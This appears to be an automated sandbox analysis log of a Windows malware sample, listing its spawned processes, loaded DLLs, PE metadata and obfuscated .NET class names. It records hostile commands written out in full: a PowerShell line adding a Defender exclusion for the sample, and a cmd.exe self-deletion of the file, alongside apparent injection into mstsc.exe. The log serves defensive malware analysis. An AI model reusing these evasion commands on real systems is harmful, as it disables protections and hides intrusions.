          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: TEKL#U0130F #U0130ST.exeReversingLabs: Detection: 34%
          Source: mstsc.exeString found in binary or memory: unknown-client-address
          Source: unknownProcess created: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe"
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe"
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess created: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\mstsc.exe "C:\Windows\SysWOW64\mstsc.exe"
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe"Jump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess created: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\mstsc.exe "C:\Windows\SysWOW64\mstsc.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe"Jump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: credui.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: cryptui.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: ktmw32.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: TEKL#U0130F #U0130ST.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: TEKL#U0130F #U0130ST.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: TEKL#U0130F #U0130ST.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: rFP.pdb source: TEKL#U0130F #U0130ST.exe
          Source: Binary string: wntdll.pdbUGP source: TEKL#U0130F #U0130ST.exe, 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000008.00000003.1626136595.000000000498B000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000008.00000003.1624065031.00000000047D0000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000008.00000002.2806843490.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000008.00000002.2806843490.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: TEKL#U0130F #U0130ST.exe, TEKL#U0130F #U0130ST.exe, 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, mstsc.exe, 00000008.00000003.1626136595.000000000498B000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000008.00000003.1624065031.00000000047D0000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000008.00000002.2806843490.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000008.00000002.2806843490.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: rFP.pdbSHA256 source: TEKL#U0130F #U0130ST.exe
          Source: Binary string: mstsc.pdbGCTL source: TEKL#U0130F #U0130ST.exe, 00000004.00000002.1625524944.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, mstsc.exe, 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: mstsc.pdb source: TEKL#U0130F #U0130ST.exe, 00000004.00000002.1625524944.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, mstsc.exe, mstsc.exe, 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_0087B05F LoadLibraryW,GetProcAddress,memset,FreeLibrary,8_2_0087B05F
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 0_2_09102B10 push eax; retf 0_2_09102B11
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 0_2_09102512 push eax; retf 0_2_09102513
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 0_2_091027B3 push eax; retf 0_2_091027C2
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 0_2_091027EB push eax; retf 0_2_091027EC
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 0_2_0910268A push eax; retf 0_2_0910268B
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 0_2_091026E6 push eax; retf 0_2_091026E7
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_0041B863 push esi; iretd 4_2_0041B866
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_00416B15 push 560BADFBh; retf 4_2_00416B1A
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_0040E44C push fs; iretd 4_2_0040E453
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_0041D4D2 push eax; ret 4_2_0041D4D8
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_0041D4DB push eax; ret 4_2_0041D542
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_0041D485 push eax; ret 4_2_0041D4D8
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_0041D53C push eax; ret 4_2_0041D542
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B1225F pushad ; ret 4_2_01B127F9
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B127FA pushad ; ret 4_2_01B127F9
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B409AD push ecx; mov dword ptr [esp], ecx4_2_01B409B6
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B1283D push eax; iretd 4_2_01B12858
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B1B008 push es; iretd 4_2_01B1B009
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B11200 push eax; iretd 4_2_01B11369
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B19939 push es; iretd 4_2_01B19940
          Source: C:\Windows\explorer.exeCode function: 6_2_0DEAF9B5 push esp; retn 0000h6_2_0DEAFAE7
          Source: C:\Windows\explorer.exeCode function: 6_2_0DEAFB02 push esp; retn 0000h6_2_0DEAFB03
          Source: C:\Windows\explorer.exeCode function: 6_2_0DEAFB1E push esp; retn 0000h6_2_0DEAFB1F
          Source: C:\Windows\explorer.exeCode function: 6_2_0EA0CB02 push esp; retn 0000h6_2_0EA0CB03
          Source: C:\Windows\explorer.exeCode function: 6_2_0EA0CB1E push esp; retn 0000h6_2_0EA0CB1F
          Source: C:\Windows\explorer.exeCode function: 6_2_0EA0C9B5 push esp; retn 0000h6_2_0EA0CAE7
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_00889064 push ecx; ret 8_2_00889077
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_007792D4 pushad ; retf 8_2_007792D5
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_007792D0 push eax; retf 8_2_007792D1
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_007792A8 push eax; retf 000Fh8_2_007792A9
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_00775550 pushfd ; retn 0077h8_2_00775551
          Source: TEKL#U0130F #U0130ST.exeStatic PE information: section name: .text entropy: 7.59023926160002
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, BCrQGsqvPdUStWsBTF.csHigh entropy of concatenated method names: 'GxDY9spGrN', 'hhYY2QJabx', 'kYgY6T85nS', 'MmOYU6dt3Z', 'Bg9YVnxeQC', 'DI4YJRvmMW', 'giEUCSGtcyFpHa1kcr', 'BCuO8ok9UsrfPsUv6v', 'WhbYYKAt5A', 'at4YhhfLC6'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, RdBPx03YDSZvyu5ICnD.csHigh entropy of concatenated method names: 'OR4nQlt7Gf', 'FEOnsBkVSt', 'pb9na0bTuH', 'WuGnHrUsJA', 'C8Qnf6TOtp', 'wMlnrRXS5a', 'WZdnEF7U40', 'xTInbT8R2s', 'TuGnvbmRmZ', 'kOQnMyg40x'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, ibOEfqxxUjtRwYjuxF.csHigh entropy of concatenated method names: 'nAUOokVmgl', 'tQtO0euI6X', 'XlbO7EPgjE', 'YLFO99pBxF', 'PCaO2DRkS2', 'roJ7W1fQu3', 'm0h7phBK8Q', 'GCn7RT2Clh', 'kQS7DIJiJ0', 'TNU7uf0JC2'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, eDTX6S33VGLGAsL4lRj.csHigh entropy of concatenated method names: 'ToString', 'kdb8h0yPIe', 'bBM8qHRJ1M', 'nTg8ofUWHS', 'QHr8TNlAC1', 'gkE80fi8wR', 'm2q8KPwVwy', 'bPQ87l4MSV', 'lI7P326XBOUmy1MapVK', 'DswoQF6KT8YcMf2SxXL'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, Gu6jH1KHT2aaVqnGJC.csHigh entropy of concatenated method names: 'Wv3GbiGIuT', 'onZGvy20U0', 'dYAGkYvqK5', 'tLiGiofXcG', 'kqyGL7CNWN', 'yq5GtIKpee', 'QYqGCuqVtb', 'C1LGPY2Ow4', 'vrBGI7Brui', 'YG9GZgQsUT'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, CpXuqheKeNcOl2gM1t.csHigh entropy of concatenated method names: 'HCW9TcjaUu', 'pci9KDPDcS', 'sCs9OIgjmE', 'j1ZOc4Bdpr', 'SSFOz0YgpG', 'InK91MXTo0', 'uog9YY8u6Q', 'eg79NJ8wNN', 'gLK9hB217i', 'owx9qG5KgS'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, pNi9qYEPka9rt5br50.csHigh entropy of concatenated method names: 'wk5xDjW5Jj', 'XJpxcpuMCF', 'u7q31Jad3P', 'ACu3YZhXd9', 'iI1xZL60C6', 'qlyxAk2TdU', 'U8TxeKcRXN', 'PPMxjdVIBE', 'WE6xgigPvw', 'nQsxBe3Mbh'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, cCXDhPnYieu7sLXkQZ.csHigh entropy of concatenated method names: 'Ace0jdUdUL', 'QIy0gEZ24S', 'g6E0Bgc8u4', 'hyH0mnnruk', 'SUu0Wdg61C', 'IAQ0prqQWg', 'ggx0RZ1sqt', 'JqS0DiOmqf', 'FPD0uIL0bG', 'ifd0cFX8SC'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, oEx3AcJSlo38dsWwUD.csHigh entropy of concatenated method names: 'J05aH5Elc', 'qfjHtTYHv', 'VbKr2xJnf', 'yanEgXEhG', 'j6Zv0HxZR', 'VDqMJn9Pn', 'Q5K4OyKWO1s5O2sQHg', 'Wy2T8LBRUwynB9s9nn', 'NMQ3BToFD', 'TuS8EIKrY'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, nFFUXqHlVSKFgwBgWS.csHigh entropy of concatenated method names: 'uQBVIWwM19', 'XioVAs53CB', 'E2dVjhYpha', 'U3JVgnKiut', 'wSBViXbt9g', 'rvMVFCf0ys', 'fugVLdbTkt', 'OLOVtdAi9a', 'xosV5y8O8T', 'zJcVC801MR'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, S07V4koBSSy8qnyCAt.csHigh entropy of concatenated method names: 'MbE3k4qfkD', 'SHY3iKUbBB', 'nX33F5AdRv', 'Brp3L5yQO4', 'rPe3jZ2R7m', 'pPX3thBPc0', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, IfnAblaBLdQWkhCorN.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'oUSNu9nfe2', 'loJNcUVtfR', 'OmCNzeXHbS', 'oHuh14Xa98', 'yvThYaFvfO', 'dvUhNKNrsY', 'vlKhhXewoJ', 'pdoTRWtrwE2KjF7Dves'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, VcyhQyiD2xkH0fXI2Z.csHigh entropy of concatenated method names: 'cxl7feVxjq', 'TDb7ExpJSm', 'FQ7KFEcshq', 'at5KLnGMd9', 'cwKKtMXFs3', 'Y7mK5f14Ya', 'MjbKCIlaZg', 'fTaKPpbxtN', 'rmSKlI1hhF', 'xIdKIq9beD'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, D3aJ9nhd632UudjdRf.csHigh entropy of concatenated method names: 'jWyKH9fCVr', 'xPFKrIX3Ta', 'HHLKbk9mbY', 'pg0KvU0sWS', 'fRhKVM8h8N', 'w43KJxRX4Y', 'HSTKx357n8', 'UqUK3GCecb', 'h0ZKnfS8Mg', 'Wp2K8GM7J5'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, BfG1TKQWfgmOliB4Uw.csHigh entropy of concatenated method names: 'lPUnYVPWkm', 'zA2nhjNY0Y', 'Bxqnq7KDe8', 'SGUnT4pDTy', 'UFJn0sL9L1', 'lGAn7Z6mvq', 'LrgnO1ePrE', 'o083RpZgj0', 'Jpk3DxXXEd', 'jZ13ux0Q4y'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, YIiILejVHVtoOOhYTE.csHigh entropy of concatenated method names: 'CRu3TyiUcM', 'oZf30jR9X4', 'PBe3KQ2Q4r', 'WGU37tcOec', 'x2Q3OjDoUY', 'D01396SUkF', 'j81321Ocm4', 'lBl3ycRdhM', 'buL36eka6k', 'BNl3UY6g7M'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, dAYBWvDDYYTIM9prkJ.csHigh entropy of concatenated method names: 'GLKhowAQDu', 'Re4hTNt19w', 'oj3h0LUVy7', 'J4RhKobdiV', 'bG9h7XlSl6', 'KJYhOIBi2n', 'pdph9GgvJ2', 'gmqh2TGRXX', 'zBNhym1orI', 'GK2h6m5q0D'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, rQHPQKwP5AfLbIMCuh.csHigh entropy of concatenated method names: 'bV29QqqI1q', 'kWQ9swQDVC', 'AnK9aBLpyL', 'oLl9H6yrrw', 'eja9f6jfeR', 'NPa9r8DyZZ', 'UhD9EXJtAX', 'iBe9bF7GFY', 'MbP9vvJJjp', 'kma9Mk4hCT'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, DO6p58WyMYhYgejVx7.csHigh entropy of concatenated method names: 'Dispose', 'XdlYuC79wQ', 'IZINijLNyH', 'u9lXX3U2v9', 'yq2Yc2TSh0', 'nljYzpF2pR', 'ProcessDialogKey', 'otSN1tKJi7', 'VD7NYDfRa9', 'L6aNNJhMXW'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.9080000.3.raw.unpack, BCrQGsqvPdUStWsBTF.csHigh entropy of concatenated method names: 'GxDY9spGrN', 'hhYY2QJabx', 'kYgY6T85nS', 'MmOYU6dt3Z', 'Bg9YVnxeQC', 'DI4YJRvmMW', 'giEUCSGtcyFpHa1kcr', 'BCuO8ok9UsrfPsUv6v', 'WhbYYKAt5A', 'at4YhhfLC6'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.9080000.3.raw.unpack, RdBPx03YDSZvyu5ICnD.csHigh entropy of concatenated method names: 'OR4nQlt7Gf', 'FEOnsBkVSt', 'pb9na0bTuH', 'WuGnHrUsJA', 'C8Qnf6TOtp', 'wMlnrRXS5a', 'WZdnEF7U40', 'xTInbT8R2s', 'TuGnvbmRmZ', 'kOQnMyg40x'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.9080000.3.raw.unpack, ibOEfqxxUjtRwYjuxF.csHigh entropy of concatenated method names: 'nAUOokVmgl', 'tQtO0euI6X', 'XlbO7EPgjE', 'YLFO99pBxF', 'PCaO2DRkS2', 'roJ7W1fQu3', 'm0h7phBK8Q', 'GCn7RT2Clh', 'kQS7DIJiJ0', 'TNU7uf0JC2'
